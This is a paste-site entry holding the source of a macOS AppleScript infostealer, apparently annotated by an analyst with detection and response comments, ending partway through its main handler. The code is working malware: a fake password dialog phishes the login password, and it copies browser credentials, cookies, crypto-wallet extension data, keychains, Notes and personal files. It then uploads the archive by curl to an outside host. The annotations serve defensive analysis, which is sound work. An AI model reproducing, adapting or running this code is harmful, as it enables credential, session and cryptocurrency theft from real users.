
Untitled

a guest
Aug 31st, 2025
AppleScript 21.97 KB | Cybersecurity | 0 0
  1. osascript -e 'on mkdir(someItem)
  -- Analyst note: everything from the opening quote on the line above to the line that reads main() followed by a quote is a single AppleScript handed to osascript -e.
  -- mkdir: shell-quotes the POSIX path of someItem and runs "mkdir -p" on it through do shell script.
  -- The try block swallows every error, so a failure here is silent.
  2. try
  3. set filePosixPath to quoted form of (POSIX path of someItem)
  4. do shell script "mkdir -p " & filePosixPath
  5. end try
  6. end mkdir
  -- readfile: returns the contents of the file at POSIX path pather.
  -- Returns "" when the read raises an error (missing file, no permission).
  7. on readfile(pather)
  8. try
  9. set theFile to POSIX file pather
  10. set fileContents to read theFile
  11. return fileContents
  12. end try
  13. return ""
  14. end readfile
  -- FileName: returns the text after the last "/" in filePath.
  -- It reverses the string, keeps what precedes the first "/", and reverses that back.
  -- Returns "" when any step raises an error.
  15. on FileName(filePath)
  16. try
  17. set reversedPath to (reverse of every character of filePath) as string
  18. set trimmedPath to text 1 thru ((offset of "/" in reversedPath) - 1) of reversedPath
  19. set finalPath to (reverse of every character of trimmedPath) as string
  20. return finalPath
  21. end try
  22. return ""
  23. end FileName
  -- Directory: returns filePath truncated just before its last "/" (the parent folder, no trailing slash).
  -- Returns "" when any step raises an error.
  24. on Directory(filePath)
  25. try
  26. set lastSlash to offset of "/" in (reverse of every character of filePath) as string
  27. set trimmedPath to text 1 thru -(lastSlash + 1) of filePath
  28. return trimmedPath
  29. end try
  30. return ""
  31. end Directory
  -- writeText: creates the parent folder of filePath (Directory + mkdir), opens filePath for writing,
  -- truncates it (eof set to 0), writes textToWrite and closes the file.
  -- All errors are swallowed by the try block.
  32. on writeText(textToWrite, filePath)
  33. try
  34. set folderPath to Directory(filePath)
  35. mkdir(folderPath)
  36. set fileRef to (open for access filePath with write permission)
  37. set eof of fileRef to 0
  38. write textToWrite to fileRef starting at eof
  39. close access fileRef
  40. end try
  41. end writeText
  -- readwrite: copies one file from path_to_file to path_as_save.
  -- The value read into fileContent is not used again in this handler; the copy itself is done by the shell.
  -- Detection note: do shell script hands the command line to a shell, so each copied file
  -- shows up in process telemetry as osascript spawning a shell that runs "cat <src> > <dst>".
  42. on readwrite(path_to_file, path_as_save)
  43. try
  44. set fileContent to read path_to_file
  45. set folderPath to Directory(path_as_save)
  46. mkdir(folderPath)
  47. do shell script "cat " & quoted form of path_to_file & " > " & quoted form of path_as_save
  48. end try
  49. end readwrite
  -- isDir: runs "file -b" on the shell-quoted POSIX path of someItem and returns true
  -- when the output ends with "directory"; returns false otherwise and on any error.
  50. on isDir(someItem)
  51. try
  52. set filePosixPath to quoted form of (POSIX path of someItem)
  53. set fileType to (do shell script "file -b " & filePosixPath)
  54. if fileType ends with "directory" then
  55. return true
  56. end if
  57. end try
  58. return false
  59. end isDir
  -- GrabFolder: recursive copy of sourceFolder into destinationFolder.
  -- Entries whose name is in exceptionsList (cache and crash-report folders, .DS_Store, "tor" and so on) are skipped.
  -- Sub-folders recurse into GrabFolder, plain files go through readwrite.
  -- "without invisibles" leaves hidden entries out of the listing.
  60. on GrabFolder(sourceFolder, destinationFolder)
  61. try
  62. set exceptionsList to {".DS_Store", "Partitions", "Code Cache", "Cache", "market-history-cache.json", "journals", "Previews", "GPUCache", "DawnCache", "Crashpad", "DawnWebGPUCache", "DawnGraphiteCache", "__update__", "tor"}
  63. set fileList to list folder sourceFolder without invisibles
  64. mkdir(destinationFolder)
  65. repeat with currentItem in fileList
  66. if currentItem is not in exceptionsList then
  67. set itemPath to sourceFolder & "/" & currentItem
  68. set savePath to destinationFolder & "/" & currentItem
  69. if isDir(itemPath) then
  70. GrabFolder(itemPath, savePath)
  71. else
  72. readwrite(itemPath, savePath)
  73. end if
  74. end if
  75. end repeat
  76. end try
  77. end GrabFolder
  -- GetUUID: reads the file at pather and looks for searchString.
  -- It takes the 56 characters that follow the match and returns the part before the first backslash in them.
  -- Returns the literal string "not found" when the key is absent, no backslash follows, or any error occurs.
  78. on GetUUID(pather, searchString)
  79. try
  80. set theFile to POSIX file pather
  81. set fileContents to read theFile
  82. set startPos to offset of searchString in fileContents
  83. if startPos is 0 then
  84. return "not found"
  85. end if
  86. set uuidStart to startPos + (length of searchString)
  87. set rawuuid to text uuidStart thru (uuidStart + 55) of fileContents
  88. set endpos to offset of "\\" in rawuuid
  89. if endpos is 0 then
  90. return "not found"
  91. end if
  92. set realuuid to text uuidStart thru (uuidStart + endpos - 2) of fileContents
  93. return realuuid
  94. on error
  95. return "not found"
  96. end try
  97. end GetUUID
  -- firewallets: for a Gecko profile at firepath, looks up two extension entries in prefs.js
  -- (labelled MetaMask and BNB_Chain_Wallet) through GetUUID.
  -- For each value found it walks storage/default, selects folders whose name contains that value
  -- and "userContext", and copies every sub-folder of their idb/ directory to savePath/<label>/.
  -- NOTE(review): the first search key reads "[email protected]" on this page; that looks like
  -- the e-mail masking applied by the hosting site rather than the original literal.
  -- Scope note: the data copied here is the browser-extension wallet storage of the profile.
  98. on firewallets(firepath, savePath)
  99. try
  100. set fire_wallets to {{"MetaMask", "[email protected]\\\":\\\""}, {"BNB_Chain_Wallet", "0a395005-c941-4030-83c9-018ee43e3414}\\\":\\\""}}
  101. repeat with fire_wallet in fire_wallets
  102. set uuid to GetUUID(firepath & "/prefs.js", item 2 of fire_wallet)
  103. if uuid is not "not found" then
  104. set walkpath to firepath & "/storage/default/"
  105. set fileList to list folder walkpath without invisibles
  106. repeat with currentItem in fileList
  107. if (currentItem contains uuid) and (currentItem contains "userContext") then
  108. set fwallet to walkpath & currentItem & "/idb/"
  109. set walletFiles to list folder fwallet without invisibles
  110. repeat with currentWallet in walletFiles
  111. if isDir(fwallet & currentWallet) then
  112. GrabFolder(fwallet & currentWallet, savePath & "/" & item 1 of fire_wallet & "/")
  113. end if
  114. end repeat
  115. end if
  116. end repeat
  117. end if
  118. end repeat
  119. end try
  120. end firewallets
  -- parseFF: iterates over every entry of the profiles folder passed as firefox.
  -- Per profile it calls firewallets (output under writemind/Exts/<browser>_<profile>) and copies
  -- cookies.sqlite, formhistory.sqlite, key4.db and logins.json to writemind/Brs/<browser>_<profile>.
  -- Response note: key4.db plus logins.json is the saved-login store of the profile, so saved passwords
  -- and session cookies of any profile processed here should be treated as exposed.
  121. on parseFF(browsername, firefox, writemind)
  122. try
  123. set myFiles to {"/cookies.sqlite", "/formhistory.sqlite", "/key4.db", "/logins.json"}
  124. set fileList to list folder firefox without invisibles
  125. repeat with currentItem in fileList
  126. set brPrName to browsername & "_" & currentItem
  127. set savePath to writemind & "Brs/" & brPrName
  128. set extSavePath to writemind & "Exts/" & brPrName
  129. firewallets(firefox & currentItem, extSavePath)
  130. set readpath to firefox & currentItem
  131. repeat with FFile in myFiles
  132. readwrite(readpath & FFile, savePath & FFile)
  133. end repeat
  134. end repeat
  135. end try
  136. end parseFF
  -- checkvalid: tests a candidate login password by running "dscl . authonly <user> <password>".
  -- Returns true when the command prints nothing, false when it prints anything or raises an error.
  -- Detection note: the candidate password is passed as a command-line argument, so endpoint
  -- telemetry that records process arguments will show dscl . authonly launched beneath osascript.
  137. on checkvalid(username, password_entered)
  138. try
  139. set result to do shell script "dscl . authonly " & quoted form of username & space & quoted form of password_entered
  140. if result is not equal to "" then
  141. return false
  142. else
  143. return true
  144. end if
  145. on error
  146. return false
  147. end try
  148. end checkvalid
  -- getpwd: obtains the login password of the current user.
  -- If an empty password validates, it queries the keychain item "Chrome" with the security tool
  -- and writes the output to writemind/masterpass-chrome; that branch falls through and returns "".
  -- Otherwise it loops on a script-generated dialog (hidden answer, 150 second timeout) until
  -- checkvalid accepts the typed value, and returns that value.
  -- Awareness note: the prompt is an AppleScript display dialog, not a system authorization sheet.
  -- Its fixed title "Application wants to install helper" and body text are usable for user guidance and hunting.
  149. on getpwd(username, writemind)
  150. try
  151. if checkvalid(username, "") then
  152. set result to do shell script "security 2>&1 > /dev/null find-generic-password -ga \"Chrome\" | awk \"{print $2}\""
  153. writeText(result as string, writemind & "masterpass-chrome")
  154. else
  155. repeat
  156. set result to display dialog "Required Application Helper. Please enter device password to continue." default answer "" with icon caution buttons {"Continue"} default button "Continue" giving up after 150 with title "Application wants to install helper" with hidden answer
  157. set password_entered to text returned of result
  158. if checkvalid(username, password_entered) then
  159. return password_entered
  160. end if
  161. end repeat
  162. end if
  163. end try
  164. return ""
  165. end getpwd
  -- grabPlugins: lists the folder given in paths and, for every entry whose name contains one of the
  -- extension ids in pluginList, copies that entry with GrabFolder to savePath/<id>.
  -- When index is true the destination gets an extra /IndexedDB/ component.
  166. on grabPlugins(paths, savePath, pluginList, index)
  167. try
  168. set fileList to list folder paths without invisibles
  169. repeat with PFile in fileList
  170. repeat with currentPlugin in pluginList
  171. if (PFile contains currentPlugin) then
  172. set newpath to paths & PFile
  173. set newsavepath to savePath & "/" & currentPlugin
  174. if index then
  175. set newsavepath to newsavepath & "/IndexedDB/"
  176. end if
  177. GrabFolder(newpath, newsavepath)
  178. end if
  179. end repeat
  180. end repeat
  181. end try
  182. end grabPlugins
  -- chromium: collects data from every Chromium-family browser listed in chromium_map
  -- (pairs of short label and user-data folder).
  -- pluginList and indexedPlugins hold 32-character browser-extension ids; the page does not name them.
  -- NOTE(review): at least nkbihfbeogaeaoehlefnkodbefgpgknn is the MetaMask id, which suggests a wallet
  -- and credential-extension target list - confirm the rest against the extension store before relying on it.
  -- For each folder named "Default" or containing "Profile" the handler copies Cookies (from /Network/Cookies
  -- and /Cookies), Web Data and Login Data to writemind/Brs/<label>_<profile>, and the matching
  -- Local Extension Settings and IndexedDB folders to writemind/Exts/<label>_<profile>.
  -- Response note: saved logins, autofill data, session cookies and extension storage of every profile
  -- found should be treated as exposed; sessions need revoking, not just passwords changing.
  183. on chromium(writemind, chromium_map)
  184. set pluginList to {"ldinpeekobnhjjdofggfgjlcehhmanlj", "nphplpgoakhhjchkkhmiggakijnkhfnd", "jbkgjmpfammbgejcpedggoefddacbdia", "fccgmnglbhajioalokbcidhcaikhlcpm", "nebnhfamliijlghikdgcigoebonmoibm", "fdcnegogpncmfejlfnffnofpngdiejii", "mfhbebgoclkghebffdldpobeajmbecfk", "ffbceckpkpbcmgiaehlloocglmijnpmp", "kfdniefadaanbjodldohaedphafoffoh", "bedogdpgdnifilpgeianmmdabklhfkcn", "kpfchfdkjhcoekhdldggegebfakaaiog", "klnaejjgbibmhlephnhpmaofohgkpgkd", "opcgpfmipidbgpenhmajoajpbobppdil", "mmmjbcfofconkannjonfmjjajpllddbg", "modjfdjcodmehnpccdjngmdfajggaoeh", "dkdedlpgdmmkkfjabffeganieamfklkm", "ifclboecfhkjbpmhgehodcjpciihhmif", "ppbibelpcjmhbdihakflkdcoccbgbkpo", "ejjladinnckdgjemekebdpeokbikhfci", "kkpllkodjeloidieedojogacfhpaihoh", "apnehcjmnengpnmccpaibjmhhoadaico", "jiepnaheligkibgcjgjepjfppgbcghmp", "jojhfeoedkpkglbfimdfabpdfjaoolaf", "idpdilbfamoopcfofbipefhmmnflljfi", "lbjapbcmmceacocpimbpbidpgmlmoaao", "oiohdnannmknmdlddkdejbmplhbdcbee", "fldfpgipfncgndfolcbkdeeknbbbnhcc", "fpkhgmpbidmiogeglndfbkegfdlnajnf", "lgmpcpglpngdoalbgeoldeajfclnhafa", "ilhaljfiglknggcoegeknjghdgampffk", "pfccjkejcgoppjnllalolplgogenfojk", "cnmamaachppnkjgnildpdmkaakejnhae", "eajafomhmkipbjmfmhebemolkcicgfmd", "emeeapjkbcbpbpgaagfchmcgglmebnen", "ibnejdfjmmkpcnlpebklmnkoeoihofec", "hifafgmccdpekplomjjkcfgodnhcellj", "ffnbelfdoeiohenkjibnmadjiehjhajb", "fnjhmkhhmkbjkkabndcnnogagogbneec", "bcopgchhojmggmffilplmbdicgaihlkp", "cmoakldedjfnjofgbbfenefcagmedlga", "ifckdpamphokdglkkdomedpdegcjhjdp", "ibljocddagjghmlpgihahamcghfggcjc", "cjmkndjhnagcfbpiemnkdpomccnjblmj", "kbdcddcmgoplfockflacnnefaehaiocb", "cgeeodpfagjceefieflmdfphplkenlfk", "afbcbjpbpfadlkmhmclhkeeodmamcflc", "fdchdcpieegfofnofhgdombfckhbcokj", "gjlmehlldlphhljhpnlddaodbjjcchai", "ellkdbaphhldpeajbepobaecooaoafpg", "ojbcfhjmpigfobfclfflafhblgemeidi", "ghlmndacnhlaekppcllcpcjjjomjkjpg", "kgdijkcfiglijhaglibaidbipiejjfdp", "abkahkcbhngaebpcgfmhkoioedceoigp", "ammjlinfekkoockogfhdkgcohjlbhmff", 
"pdliaogehgdbhbnmkklieghmmjkpigpa", "jnlgamecbpmbajjfhmmmlhejkemejdma", "nbdhibgjnjpnkajaghbffjbkcgljfgdi", "jfdlamikmbghhapbgfoogdffldioobgl", "fijngjgcjhjmmpcmkeiomlglpeiijkld", "hgbeiipamcgbdjhfflifkgehomnmglgk", "pmmnimefaichbcnbndcfpaagbepnjaig", "cflgahhmjlmnjbikhakapcfkpbcmllam", "keenhcnmdmjjhincpilijphpiohdppno", "bipdhagncpgaccgdbddmbpcabgjikfkn", "bcenedbpaaegpnijoadpdjiachahncdg", "pocmplpaccanhmnllbbkpgfliimjljgo", "klghhnkeealcohjjanjjdaeeggmfmlpl", "cjookpbkjnpkmknedggeecikaponcalb", "ojggmchlghnjlapmfbnjholfjkiidbch", "dngmlblcodfobpdpecaadgfbcggfjfnm", "jnldfbidonfeldmalbflbmlebbipcnle", "ehjiblpccbknkgimiflboggcffmpphhp", "agoakfejjabomempkjlepdflaleeobhb", "fopmedgnkfpebgllppeddmmochcookhc", "dmkamcknogkgcdfhhbddcghachkejeap", "iglbgmakmggfkoidiagnhknlndljlolb", "opfgelmcmbiajamepnmloijbpoleiama", "gkeelndblnomfmjnophbhfhcjbcnemka", "dgiehkgfknklegdhekgeabnhgfjhbajd", "gafhhkghbfjjkeiendhlofajokpaflmk", "imlcamfeniaidioeflifonfjeeppblda", "penjlddjkjgpnkllboccdgccekpkcbin", "nhnkbkgjikgcigadomkphalanndcapjk", "egjidjbpglichdcondbcbdnbeeppgdph", "dlcobpjiigpikoobohmabehhmhfoodbb", "dldjpboieedgcmpkchcjcbijingjcgok", "acmacodkjbdgmoleebolmdjonilkdbch", "lccbohhgfkdikahanoclbdmaolidjdfl", "pcndjhkinnkaohffealmlmhaepkpmgkb", "gjagmgiddbbciopjhllkdnddhcglnemk", "cnncmdhjacpkmjmkcafchppbnpnhdmon", "mfgccjchihfkkindfppnaooecgfneiii", "ieldiilncjhfkalnemgjbffmpomcaigi", "ckklhkaabbmdjkahiaaplikpdddkenic", "loinekcabhlmhjjbocijdoimmejangoa", "mgffkfbidihjpoaomajlbgchddlicgpn", "pnndplcbkakcplkjnolgbkdgjikjednm", "mcohilncbfahbmgdjkbpemcciiolgcge", "bgpipimickeadkjlklgciifhnalhdjhe", "pdadjkfkgcafgbceimcpbkalnfnepbnk", "jiidiaalihmmhddjgbnbgdfflelocpak", "aeachknmefphepccionboohckonoeemg", "gdokollfhmnbfckbobkdbakhilldkhcj", "jiiigigdinhhgjflhljdkcelcjfmplnd", "kmphdnilpmdejikjdnlbcnmnabepfgkh", "jaooiolkmfcmloonphpiiogkfckgciom", "fcckkdbjnoikooededlapcalpionmalo", "mdnaglckomeedfbogeajfajofmfgpoae", "ebfidpplhabeedpnhjnobghokpiioolj", 
"dbgnhckhnppddckangcjbkjnlddbjkna", "cpmkedoipcpimgecpmgpldfpohjplkpp", "epapihdplajcdnnkdeiahlgigofloibg", "iokeahhehimjnekafflcihljlcjccdbe", "cihmoadaighcejopammfbmddcmdekcje", "hnfanknocfeofbddgcijnmhnfnkdnaad", "kilnpioakcdndlodeeceffgjdpojajlo", "abogmiocnneedmmepnohnhlijcjpcifd", "bofddndhbegljegmpmnlbhcejofmjgbn", "aholpfdialjgjfhomihkjbmgjidlcdno", "hdkobeeifhdplocklknbnejdelgagbao", "oafedfoadhdjjcipmcbecikgokpaphjk", "bfnaelmomeimhlpmgjnjophhpkkoljpa", "nkbihfbeogaeaoehlefnkodbefgpgknn", "lfmmjkfllhmfmkcobchabopkcefjkoip", "aiifbnbfobpmeekipheeijimdpnlpgpp", "anokgmphncpekkhclmingpimjmcooifb", "mnfifefkajgofkcjkemidiaecocnkjeh", "momakdpclmaphlamgjcndbgfckjfpemp", "akkmagafhjjjjclaejjomkeccmjhdkpa", "ehgjhhccekdedpbkifaojjaefeohnoea", "mkpegjkblkkefacfnmkajcjmabijhclg", "mlhakagmgkmonhdonhkpjeebfphligng", "niiaamnmgebpeejeemoifgdndgeaekhe", "jnmbobjmhlngoefaiojfljckilhhlhcj", "onhogfjeacnfoofkfgppdlbmlmnplgbn", "kppfdiipphfccemcignhifpjkapfbihd", "hcjhpkgbmechpabifbggldplacolbkoh", "flpiciilemghbmfalicajoolhkkenfel", "mlbnicldlpdimbjdcncnklfempedeipj", "cfbfdhimifdmdehjmkdobpcjfefblkjm", "ocjobpilfplciaddcbafabcegbilnbnb", "pgiaagfkgcbnmiiolekcfmljdagdhlcm", "enabgbdfcbaehmbigakijjabdpdnimlg", "bifidjkcdpgfnlbcjpdkdcnbiooooblg", "lnnnmfcpbkafcpgdilckhmhbkkbpkmid", "nlgbhdfgdhgbiamfdfmbikcdghidoadd", "fcfcfllfndlomdhbehjjcoimbgofdncg", "lpilbniiabackdjcionkobglmddfbcjo", "efbglgofoippbgcjepnhiblaibcnclgk", "fhbohimaelbohpjbbldcngcnapndodjp", "gkodhkbmiflnmkipcmlhhgadebbeijhh", "bocpokimicclpaiekenaeelehdjllofo", "bhhhlbepdkbapadjdnnojkbgioiodbic", "aflkmfhebedbjioipglgcbcmnbpgliof", "mkchoaaiifodcflmbaphdgeidocajadp", "mapbhaebnddapnmifbbkgeedkeplgjmf", "lmkncnlpeipongihbffpljgehamdebgi", "gjnckgkfmgmibbkoficdidcljeaaaheg", "ppdadbejkmjnefldpcdjhnkpbjkikoip", "bopcbmipnjdcdfflfgjdgdjejmgpoaab", "kamfleanhcmjelnhaeljonilnmjpkcjc", "cphhlgmgameodnhkjdmkpanlelnlohao", "hnhobjmcibchnmglfbldbfabcgaknlkj", "nknhiehlklippafakaeklbeglecifhad", 
"kjjebdkfeagdoogagbhepmbimaphnfln", "phkbamefinggmakgklpkljjmgibohnba", "lakggbcodlaclcbbbepmkpdhbcomcgkd", "ookjlbkiijinhpmnjffcofjonbfbgaoc", "mdjmfdffdcmnoblignmgpommbefadffd", "jblndlipeogpafnldhgmapagcccfchpi", "hbbgbephgojikajhfbomhlmmollphcad", "dpcklmdombjcplafheapiblogdlgjjlb", "hmeobnfnfcmdkdcmlblgagmfpfboieaf", "kmhcihpebfmpgmihbkipmjlmmioameka", "kennjipeijpeengjlogfdjkiiadhbmjl", "amkmjjmmflddogmhpjloimipbofnfjih", "idnnbdplmphpflfnlkomgpfbpcgelopg", "fmblappgoiilbgafhjklehhfifbdocee", "heamnjbnflcikcggoiplibfommfbkjpj", "khpkpbbcccdmmclmpigdgddabeilkdpd", "omaabbefbmiijedngplfjmnooppbclkk", "nhlnehondigmgckngjomcpcefcdplmgc", "fiikommddbeccaoicoejoniammnalkfa", "ejbidfepgijlcgahbmbckmnaljagjoll", "glmhbknppefdmpemdmjnjlinpbclokhn", "kncchdigobghenbbaddojjnnaogfppfj", "hpclkefagolihohboafpheddmmgdffjm", "ilolmnhjbbggkmopnemiphomhaojndmb", "panpgppehdchfphcigocleabcmcgfoca", "nngceckbapebfimnlniiiahkandclblb", "hdokiejnpimakedhajhdlcegeplioahd", "eiaeiblijfjekdanodkjadfinkhbfgcd", "bfogiafebfohielmmehodmfbbebbbpei", "pnlccmojcmeohlpggmfnbbiapkmbliob", "aeblfdkhhhdcdjpifhhbdiojplfjncoa", "kmcfomidfpdkfieipokbalgegidffkal", "fdjamakpfbbddfjaooikfcpapjohcfmg", "ghmbeldphafepmbegfdlkpapadhbakde", "cnlhokffphohmfcddnibpohmkdfafdli", "khhapgacijodhjokkcjmleaempmchlem", "admmjipmmciaobhojoghlmleefbicajg", "caljgklbbfbcjjanaijlacgncafpegll"}
  -- Subset of ids whose IndexedDB folders are collected in addition to Local Extension Settings.
  185. set indexedPlugins to {"hnfanknocfeofbddgcijnmhnfnkdnaad", "mcohilncbfahbmgdjkbpemcciiolgcge", "aflkmfhebedbjioipglgcbcmnbpgliof", "enabgbdfcbaehmbigakijjabdpdnimlg", "cpmkedoipcpimgecpmgpldfpohjplkpp", "hdokiejnpimakedhajhdlcegeplioahd", "eiaeiblijfjekdanodkjadfinkhbfgcd", "cnlhokffphohmfcddnibpohmkdfafdli", "khhapgacijodhjokkcjmleaempmchlem", "hifafgmccdpekplomjjkcfgodnhcellj"}
  -- Per-profile items to collect; the two entries ending in "/" are folders and are routed to grabPlugins below.
  186. set chromiumFiles to {"/Network/Cookies", "/Cookies", "/Web Data", "/Login Data", "/Local Extension Settings/", "/IndexedDB/"}
  187. repeat with chromiumBrowser in chromium_map
  188. set brPrName to item 1 of chromiumBrowser & "_"
  189. set savePath to writemind & "Brs/" & brPrName
  190. set extSavePath to writemind & "Exts/" & brPrName
  191.  
  -- One try per browser: a missing or unreadable user-data folder only skips that browser.
  192. try
  193. set fileList to list folder item 2 of chromiumBrowser without invisibles
  194. repeat with currentItem in fileList
  195. if ((currentItem as string) is equal to "Default") or ((currentItem as string) contains "Profile") then
  196. repeat with CFile in chromiumFiles
  197. set readpath to (item 2 of chromiumBrowser & currentItem & CFile)
  -- The source path keeps /Network/Cookies; only the destination name is shortened to /Cookies.
  198. if ((CFile as string) is equal to "/Network/Cookies") then
  199. set CFile to "/Cookies"
  200. end if
  201. if ((CFile as string) is equal to "/Local Extension Settings/") then
  202. grabPlugins(readpath, extSavePath & currentItem, pluginList, false)
  203. else if (CFile as string) is equal to "/IndexedDB/" then
  204. grabPlugins(readpath, extSavePath & currentItem, indexedPlugins, true)
  205. else
  206. set writepath to savePath & currentItem & CFile
  207. readwrite(readpath, writepath)
  208. end if
  209. end repeat
  210. end if
  211. end repeat
  212. end try
  213. end repeat
  214. end chromium
  -- filegrabber: uses Finder scripting (tell application "Finder") to duplicate user data into
  -- writemind/Files/ and writemind/Notes/. Every step sits in its own try, so failures are silent.
  -- Items taken, in order: Safari Cookies.binarycookies (two locations), the Notes database files,
  -- Notes media attachments, Safari "Form Values", the Keychains sub-folder named after the hardware UUID,
  -- and Desktop/Documents files whose extension is in extensionsList.
  -- Detection note: the handler drives Finder from osascript and runs system_profiler through a shell.
  -- NOTE(review): on current macOS this kind of Finder automation and Desktop/Documents access is
  -- normally subject to user-consent prompts - confirm against the OS version under investigation.
  215. on filegrabber(writemind)
  216. try
  217. set destFolder to writemind & "Files/"
  218. set ntsP to writemind & "Notes/"
  219. set destinationFolderPath to POSIX file destFolder
  220. set ntsPDF to POSIX file ntsP
  221. set notesMediaFolder to POSIX file (ntsP & "Media/")
  -- Document, image, key/wallet and KeePass (kdbx) extensions collected from Desktop and Documents.
  222. set extensionsList to {"txt", "pdf", "docx", "wallet", "key", "keys", "doc", "jpeg", "png", "kdbx", "rtf", "jpg"}
  -- Running byte counters used for the size caps further down.
  223. set bankSize to 0
  224. set notesBankSize to 0
  -- Hardware UUID of the machine; used below as the name of the Keychains sub-folder to copy.
  225. set uuidString to do shell script "system_profiler SPHardwareDataType | awk \"/UUID/ { print $3 }\""
  226. mkdir(destinationFolderPath)
  227. mkdir(notesMediaFolder)
  228. tell application "Finder"
  229. try
  230. set safariFolderPath to (path to home folder as text) & "Library:Cookies:"
  231. duplicate file (safariFolderPath & "Cookies.binarycookies") to folder destinationFolderPath with replacing
  -- The copy from ~/Library/Cookies is renamed to "saf1".
  232. set name of result to "saf1"
  233. end try
  234. set safariFolder to ((path to library folder from user domain as text) & "Containers:com.apple.Safari:Data:Library:Cookies:")
  235. try
  236. duplicate file "Cookies.binarycookies" of folder safariFolder to folder destinationFolderPath with replacing
  237. end try
  238. set notesFolderPath to (path to home folder as text) & "Library:Group Containers:group.com.apple.notes:"
  239. try
  240. set notesFolder to folder notesFolderPath
  241. set notesFiles to {"NoteStore.sqlite", "NoteStore.sqlite-shm", "NoteStore.sqlite-wal"}
  242. repeat with aFile in notesFiles
  243. try
  244. duplicate (file aFile of notesFolder) to folder ntsPDF with replacing
  245. end try
  246. end repeat
  247. end try
  248. set notesAccountsPath to (notesFolderPath & "Accounts:")
  249. try
  250. set notesAccountsFolder to folder notesAccountsPath
  251. set notesAccountsFiles to every folder of notesAccountsFolder
  252. repeat with nFile in notesAccountsFiles
  253. set notesMediaPath to notesAccountsPath & name of nFile & ":Media:"
  254. set notesMediaAllProfiles to every folder of (folder notesMediaPath)
  255. repeat with profileFolder in notesMediaAllProfiles
  256. set notesMediaProfilesPath to notesMediaPath & name of profileFolder
  257. set notesMediaProfileFiles to every folder of (folder notesMediaProfilesPath)
  258. repeat with notesUUID in notesMediaProfileFiles
  259. set noteIdFiles to every file of notesUUID
  260. repeat with notesIdFile in noteIdFiles
  261. try
  262. set fileSize to size of notesIdFile as text
  263. set notesBankSize to notesBankSize + fileSize
  -- Notes media is copied only while the running total stays under 12 * 1024 * 1024 bytes.
  264. if notesBankSize < 12 * 1024 * 1024 then
  265. duplicate notesIdFile to notesMediaFolder with replacing
  266. else
  267. exit repeat
  268. end if
  269. end try
  270. end repeat
  271. end repeat
  272. end repeat
  273. end repeat
  274. end try
  275. try
  276. set safariFolderPath to (path to library folder from user domain as text) & "Safari:"
  277. duplicate (file "Form Values" of folder safariFolderPath) to destinationFolderPath with replacing
  278. end try
  279. try
  280. set keychainFolder to (path to library folder from user domain as text) & "Keychains:" & uuidString
  281. duplicate folder keychainFolder to destinationFolderPath with replacing
  282. end try
  283. try
  284. set desktopFiles to every file of desktop
  285. set documentsFiles to every file of folder "Documents" of (path to home folder)
  286. repeat with aFile in (desktopFiles & documentsFiles)
  287. set fileExtension to name extension of aFile
  288. if fileExtension is in extensionsList then
  289. set fileSize to size of aFile
  -- Desktop/Documents collection stops at the first file that would push the total to 10 * 1024 * 1024 bytes or more.
  290. if (bankSize + fileSize) < 10 * 1024 * 1024 then
  291. try
  292. duplicate aFile to folder destinationFolderPath with replacing
  293. set bankSize to bankSize + fileSize
  294. end try
  295. else
  296. exit repeat
  297. end if
  298. end if
  299. end repeat
  300. end try
  301. end tell
  302. end try
  303. end filegrabber
  -- send_data: uploads /tmp/salmonela.zip with curl as a multipart POST (form field "lil-arch")
  -- to https://meshsorterio.com/api/data/receive, with a fixed X-Bid request header.
  -- The on error branch waits 60 seconds and calls send_data again while attempt is below 10.
  -- The outUsername, serverIP and isBot parameters are not used in the request.
  -- Network indicators on this page: host meshsorterio.com, path /api/data/receive, and the
  -- X-Bid header value below (an identifier fixed in this sample; its meaning is not shown here).
  304. on send_data(attempt, outUsername, serverIP, isBot)
  305. try
  306. set result_send to (do shell script "curl -X POST -H \"X-Bid: " & "f48fbe39836779cadbf148b5952919fd" & "\" -F \"lil-arch=@/tmp/salmonela.zip\" https://meshsorterio.com/api/data/receive")
  307. on error
  308. if attempt < 10 then
  309. delay 60
  310. send_data(attempt + 1, outUsername, serverIP)
  311. end if
  312. end try
  313. end send_data
  314.  
  -- snd_rn: sends an empty POST with the same X-Bid header to https://meshsorterio.com/api/health.
  -- main calls it first, before any file is touched, so this request marks the start of execution
  -- in proxy or DNS logs. The on error branch waits 10 seconds while attempt is below 2.
  315. on snd_rn(attempt)
  316. try
  317. set result_send to (do shell script "curl -X POST -H \"X-Bid: f48fbe39836779cadbf148b5952919fd\" https://meshsorterio.com/api/health")
  318. on error
  319. if attempt < 2 then
  320. delay 10
  321. snd_rn(attempt + 1, outUsername, serverIP)
  322. end if
  323. end try
  324. end snd_rn
  325.  
  -- main: orchestrates the whole collection run.
  -- Order of operations: check-in request (snd_rn), marker file, hardware inventory, login-password
  -- capture, Notes/Safari copies, filegrabber, desktop wallet and keychain copies, Gecko and Chromium
  -- browser data, archive with ditto, upload (send_data), removal of the staging data.
  -- Host artifacts visible in this handler:
  --   /Users/<user>/.username  (marker, contains "a")
  --   /Users/<user>/.pwd       (validated login password, stored as plain text)
  --   /tmp/salmonela/          (staging tree: hardware, ggwp, user, Notes/, Files/, Brs/, Exts/, Wlt/, Kch/, deskwallets/)
  --   /tmp/salmonela.zip       (archive that is uploaded)
  -- The two /tmp items are deleted at the end; nothing in this script removes the two dotfiles,
  -- so they remain as evidence after a run.
  -- Response note: if ~/.pwd exists, treat the login password, the login keychain, browser-stored
  -- credentials and sessions, Notes content and every listed wallet as exposed.
  326. on main()
  327. snd_rn(0)
  328. set username to (system attribute "USER")
  329. set outUsername to "a"
  330. set serverIP to "localhost"
  331. set isBot to ""
  332. set systemProfile to "/Users/" & username
  333. writeText(outUsername, systemProfile & "/.username")
  334. set writemind to "/tmp/salmonela/"
  335. try
  -- Software, hardware and display inventory saved as "hardware" in the staging folder.
  336. set result_userinfo to (do shell script "system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType")
  337. writeText(result_userinfo, writemind & "hardware")
  338. end try
  339. set rawlib to systemProfile & "/Library/"
  340. set library to rawlib & "Application Support/"
  -- A password cached in ~/.pwd by an earlier run is re-validated; the dialog in getpwd is shown only when it fails.
  341. set password_entered to readfile(systemProfile & "/.pwd")
  342. if not checkvalid(username, password_entered) then
  343. set password_entered to getpwd(username, writemind)
  344. writeText(password_entered, systemProfile & "/.pwd")
  345. end if
  346. delay 0.01
  -- The captured password is also written into the staging folder under the name "ggwp".
  347. writeText(password_entered, writemind & "ggwp")
  348.  
  349. set noteStorePath to rawlib & "Group Containers/group.com.apple.notes/NoteStore.sqlite"
  350. readwrite(rawlib, writemind & "Notes/NoteStore.sqlite")
